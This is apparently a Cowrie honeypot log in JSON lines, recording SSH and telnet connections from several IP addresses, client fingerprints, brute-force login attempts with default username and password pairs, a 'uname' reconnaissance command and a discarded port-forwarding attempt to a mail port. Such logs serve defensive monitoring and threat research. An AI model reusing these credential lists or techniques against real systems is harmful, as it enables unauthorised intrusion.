{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:34:51.842510Z","src_ip":"41.226.27.251","session":"79c43fdf3947"}
{"eventid":"cowrie.login.success","username":"root","password":"1234","message":"login attempt [root/1234] succeeded","sensor":"my-vps","timestamp":"2025-08-31T02:34:52.014420Z","src_ip":"41.226.27.251","session":"79c43fdf3947"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T02:34:52.119136Z","src_ip":"41.226.27.251","session":"79c43fdf3947"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T02:34:52.120054Z","src_ip":"41.226.27.251","session":"79c43fdf3947"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:34:52.165810Z","src_ip":"41.226.27.251","session":"79c43fdf3947"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:34:52.166826Z","src_ip":"41.226.27.251","session":"79c43fdf3947"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44406,"dst_ip":"1.2.3.4","dst_port":23,"session":"e792feb60a4a","protocol":"telnet","message":"New connection: 212.227.125.160:44406 (1.2.3.4:23) [session: e792feb60a4a]","sensor":"my-vps","timestamp":"2025-08-31T02:35:09.627406Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44420,"dst_ip":"1.2.3.4","dst_port":23,"session":"006d50570756","protocol":"telnet","message":"New connection: 212.227.125.160:44420 (1.2.3.4:23) [session: 006d50570756]","sensor":"my-vps","timestamp":"2025-08-31T02:35:10.622373Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44424,"dst_ip":"1.2.3.4","dst_port":23,"session":"307a6cb52e01","protocol":"telnet","message":"New connection: 212.227.125.160:44424 (1.2.3.4:23) [session: 307a6cb52e01]","sensor":"my-vps","timestamp":"2025-08-31T02:35:12.647286Z"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":33154,"dst_ip":"1.2.3.4","dst_port":22,"session":"7bbc070207f5","protocol":"ssh","message":"New connection: 41.226.27.251:33154 (1.2.3.4:22) [session: 7bbc070207f5]","sensor":"my-vps","timestamp":"2025-08-31T02:35:13.014029Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:35:13.111104Z","src_ip":"41.226.27.251","session":"7bbc070207f5"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:35:13.111822Z","src_ip":"41.226.27.251","session":"7bbc070207f5"}
{"eventid":"cowrie.login.failed","username":"sonar","password":"123456","message":"login attempt [sonar/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T02:35:13.390840Z","src_ip":"41.226.27.251","session":"7bbc070207f5"}
{"eventid":"cowrie.session.closed","duration":"57.3","message":"Connection lost after 57.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:35:13.679046Z","src_ip":"212.227.125.160","session":"0cc5ab28d40d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59652,"dst_ip":"1.2.3.4","dst_port":22,"session":"dc70a12fd51c","protocol":"ssh","message":"New connection: 212.227.235.229:59652 (1.2.3.4:22) [session: dc70a12fd51c]","sensor":"my-vps","timestamp":"2025-08-31T02:35:14.020379Z"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:35:14.723960Z","src_ip":"41.226.27.251","session":"7bbc070207f5"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:35:14.796019Z","src_ip":"212.227.235.229","session":"dc70a12fd51c"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T02:35:14.796654Z","src_ip":"212.227.235.229","session":"dc70a12fd51c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44438,"dst_ip":"1.2.3.4","dst_port":23,"session":"5198735c1ab9","protocol":"telnet","message":"New connection: 212.227.125.160:44438 (1.2.3.4:23) [session: 5198735c1ab9]","sensor":"my-vps","timestamp":"2025-08-31T02:35:16.698952Z"}
{"eventid":"cowrie.session.closed","duration":"26.1","message":"Connection lost after 26.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:35:17.858520Z","src_ip":"212.227.125.160","session":"bddea13bfce6"}
{"eventid":"cowrie.login.failed","username":"es","password":"password","message":"login attempt [es/password] failed","sensor":"my-vps","timestamp":"2025-08-31T02:35:20.859427Z","src_ip":"212.227.235.229","session":"dc70a12fd51c"}
{"eventid":"cowrie.session.closed","duration":"8.7","message":"Connection lost after 8.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:35:22.678365Z","src_ip":"212.227.235.229","session":"dc70a12fd51c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58918,"dst_ip":"1.2.3.4","dst_port":23,"session":"f0d9e813293d","protocol":"telnet","message":"New connection: 212.227.125.160:58918 (1.2.3.4:23) [session: f0d9e813293d]","sensor":"my-vps","timestamp":"2025-08-31T02:35:24.912364Z"}
{"eventid":"cowrie.session.connect","src_ip":"221.144.108.2","src_port":40041,"dst_ip":"1.2.3.4","dst_port":23,"session":"e19d8019a711","protocol":"telnet","message":"New connection: 221.144.108.2:40041 (1.2.3.4:23) [session: e19d8019a711]","sensor":"my-vps","timestamp":"2025-08-31T02:35:27.437165Z"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":55096,"dst_ip":"1.2.3.4","dst_port":22,"session":"c496f514e07a","protocol":"ssh","message":"New connection: 217.72.205.35:55096 (1.2.3.4:22) [session: c496f514e07a]","sensor":"my-vps","timestamp":"2025-08-31T02:35:31.732659Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:35:31.733730Z","src_ip":"217.72.205.35","session":"c496f514e07a"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":38640,"dst_ip":"1.2.3.4","dst_port":22,"session":"344beed14495","protocol":"ssh","message":"New connection: 41.226.27.251:38640 (1.2.3.4:22) [session: 344beed14495]","sensor":"my-vps","timestamp":"2025-08-31T02:35:33.674600Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:35:33.675391Z","src_ip":"41.226.27.251","session":"344beed14495"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:35:33.722774Z","src_ip":"41.226.27.251","session":"344beed14495"}
{"eventid":"cowrie.login.failed","username":"jumpserver","password":"jumpserver","message":"login attempt [jumpserver/jumpserver] failed","sensor":"my-vps","timestamp":"2025-08-31T02:35:33.865064Z","src_ip":"41.226.27.251","session":"344beed14495"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:35:35.097394Z","src_ip":"41.226.27.251","session":"344beed14495"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50276,"dst_ip":"1.2.3.4","dst_port":22,"session":"5081199bf254","protocol":"ssh","message":"New connection: 212.227.125.160:50276 (1.2.3.4:22) [session: 5081199bf254]","sensor":"my-vps","timestamp":"2025-08-31T02:35:36.208000Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:35:36.647756Z","src_ip":"212.227.125.160","session":"5081199bf254"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T02:35:36.648556Z","src_ip":"212.227.125.160","session":"5081199bf254"}
{"eventid":"cowrie.login.failed","username":"es","password":"password","message":"login attempt [es/password] failed","sensor":"my-vps","timestamp":"2025-08-31T02:35:38.816511Z","src_ip":"212.227.125.160","session":"5081199bf254"}
{"eventid":"cowrie.session.closed","duration":30.467315435409546,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:35:40.094689Z","src_ip":"212.227.125.160","session":"e792feb60a4a"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:35:40.373476Z","src_ip":"212.227.125.160","session":"5081199bf254"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48948,"dst_ip":"1.2.3.4","dst_port":23,"session":"768acb06d576","protocol":"telnet","message":"New connection: 212.227.125.160:48948 (1.2.3.4:23) [session: 768acb06d576]","sensor":"my-vps","timestamp":"2025-08-31T02:35:41.020021Z"}
{"eventid":"cowrie.session.closed","duration":30.490901708602905,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:35:41.113196Z","src_ip":"212.227.125.160","session":"006d50570756"}
{"eventid":"cowrie.session.closed","duration":30.504108905792236,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:35:43.150368Z","src_ip":"212.227.125.160","session":"307a6cb52e01"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60670,"dst_ip":"1.2.3.4","dst_port":22,"session":"86ffa5e86ed6","protocol":"ssh","message":"New connection: 212.227.235.229:60670 (1.2.3.4:22) [session: 86ffa5e86ed6]","sensor":"my-vps","timestamp":"2025-08-31T02:35:44.052336Z"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.15","src_port":61993,"dst_ip":"1.2.3.4","dst_port":22,"session":"57a78491c027","protocol":"ssh","message":"New connection: 80.94.95.15:61993 (1.2.3.4:22) [session: 57a78491c027]","sensor":"my-vps","timestamp":"2025-08-31T02:35:46.263490Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-31T02:35:46.264304Z","src_ip":"80.94.95.15","session":"57a78491c027"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-31T02:35:46.315344Z","src_ip":"80.94.95.15","session":"57a78491c027"}
{"eventid":"cowrie.login.success","username":"root","password":"123456789","message":"login attempt [root/123456789] succeeded","sensor":"my-vps","timestamp":"2025-08-31T02:35:46.604693Z","src_ip":"80.94.95.15","session":"57a78491c027"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"81.19.77.166","dst_port":587,"src_ip":"80.94.95.15","src_port":22,"message":"direct-tcp connection request to 81.19.77.166:587 from 127.0.0.1:22","sensor":"my-vps","timestamp":"2025-08-31T02:35:46.671005Z","session":"57a78491c027"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"81.19.77.166","dst_port":587,"data":"b'E'","id":0,"message":"discarded direct-tcp forward request 0 to 81.19.77.166:587 with data b'E'","sensor":"my-vps","timestamp":"2025-08-31T02:35:46.722207Z","src_ip":"80.94.95.15","session":"57a78491c027"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:35:46.774182Z","src_ip":"80.94.95.15","session":"57a78491c027"}
{"eventid":"cowrie.session.closed","duration":30.41551423072815,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:35:47.114394Z","src_ip":"212.227.125.160","session":"5198735c1ab9"}
{"eventid":"cowrie.login.failed","username":"esroot","password":"esroot","message":"login attempt [esroot/esroot] failed","sensor":"my-vps","timestamp":"2025-08-31T02:35:47.718068Z","src_ip":"212.227.235.229","session":"45f5afb821fe"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:35:52.575587Z","src_ip":"212.227.235.229","session":"86ffa5e86ed6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:35:52.576772Z","src_ip":"212.227.235.229","session":"86ffa5e86ed6"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":54098,"dst_ip":"1.2.3.4","dst_port":22,"session":"19b301363ce3","protocol":"ssh","message":"New connection: 41.226.27.251:54098 (1.2.3.4:22) [session: 19b301363ce3]","sensor":"my-vps","timestamp":"2025-08-31T02:35:54.476817Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:35:54.477519Z","src_ip":"41.226.27.251","session":"19b301363ce3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:35:54.520781Z","src_ip":"41.226.27.251","session":"19b301363ce3"}
{"eventid":"cowrie.login.failed","username":"tom","password":"tom123","message":"login attempt [tom/tom123] failed","sensor":"my-vps","timestamp":"2025-08-31T02:35:54.733686Z","src_ip":"41.226.27.251","session":"19b301363ce3"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:35:55.984025Z","src_ip":"41.226.27.251","session":"19b301363ce3"}
{"eventid":"cowrie.session.closed","duration":31.186814785003662,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:35:56.099100Z","src_ip":"212.227.125.160","session":"f0d9e813293d"}
{"eventid":"cowrie.session.closed","duration":"84.5","message":"Connection lost after 84.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:35:56.307567Z","src_ip":"212.227.235.229","session":"45f5afb821fe"}
{"eventid":"cowrie.session.closed","duration":30.393497467041016,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:35:57.830596Z","src_ip":"221.144.108.2","session":"e19d8019a711"}
{"eventid":"cowrie.login.failed","username":"gitlab","password":"gitlab","message":"login attempt [gitlab/gitlab] failed","sensor":"my-vps","timestamp":"2025-08-31T02:36:11.545159Z","src_ip":"212.227.235.229","session":"86ffa5e86ed6"}
{"eventid":"cowrie.session.closed","duration":31.083147048950195,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:36:12.103087Z","src_ip":"212.227.125.160","session":"768acb06d576"}
